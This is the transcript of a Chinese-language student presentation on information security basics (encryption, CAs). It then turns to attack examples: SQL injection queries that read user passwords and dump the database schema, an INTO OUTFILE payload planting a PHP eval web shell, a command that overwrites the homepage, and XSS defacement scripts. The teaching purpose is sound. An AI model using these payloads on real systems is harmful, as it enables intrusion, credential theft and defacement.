Information Security

Transcript

1. 會計資訊系統簡報 - 資訊安全 簡報製作 : 四資管四甲 任家輝 指導教授 : 杜佩樺

2. 隱密性 如何確保只有寄件者及收件者可以 讀取資料

3. 可認證性 如何知道資料是來自原寄件者

4. 完整性 如何知道資料沒有被更改過

5. 不可抵賴性 防止資料傳輸/接收發生後對行為 的否認。

6. 秘密金鑰加密法(對稱性加密)

7. 公開金鑰加密法(非對稱性加密) • 收件者保留私密金鑰，並將公開金鑰公諸 於世，送件者依照公開金鑰將訊息加密， 收件者在使用私密金鑰進行解密

8. 公開金鑰加密法(非對稱性加密)

9. 可逆加密與不可逆加密

10. 安全認證中心CA

11. 延伸內容 – 從駭客面談資安 了解駭客思維，才能應付千方百計 的駭客

12. CSRF

13. None

14. SQLi

15. None

16. 查詢注入欄位 • 注入時，可能會先使用 UNION 找出可以插 入的地方爲何，例如： • http://localhost/news/?mod=news&act =show&id=-1 union

    select 1,2,3,4,5,6,7

17. • 可以看出 3, 4, 7 的地方可以插入我們想要獲取的資 料， 假如我們想要知道當前使用者為何，可以將 7 的地

    方改成 user() 如： • http://localhost/news/?mod=news&act=show& id=-1 union select 1,2,3,4,5,6,user()
18. None

19. • 若是要取得某欄位的資訊的話(以使 用者密碼為例)，則是注入-1 union select 1,2,3,4,5,6,password from user limit 0,1

20. • 使用(SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE

    @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name) )) ) )x)將整個資料庫dump出來

21. 寫後門改首頁 • ?MOD=NEWS&ACT=SHOW&ID=1 INTO OUTFILE '../../../../apache24/htdoc s/.a.php' LINES TERMINATED BY

    '<?php eval($_GET[cmd];)?>' • 透過outfile的方式建立後門檔案到網站目 錄中

22. 再透過fwrite的方式更改首頁。 • /.a.php?cmd=$fp = fopen('index.php', 'w');fwrite($fp, "Hack by 49941131");fclose($fp);

23. None

24. 或是直接以最高權限執行 server command

25. XSS

26. 使用訊息框進行XSS attack • <script>alert(‘hello’)</script>

27. 利用XSS改首頁 <script>window.onload = function(){document.write('hacked by 49941131')}</script>

28. 謝謝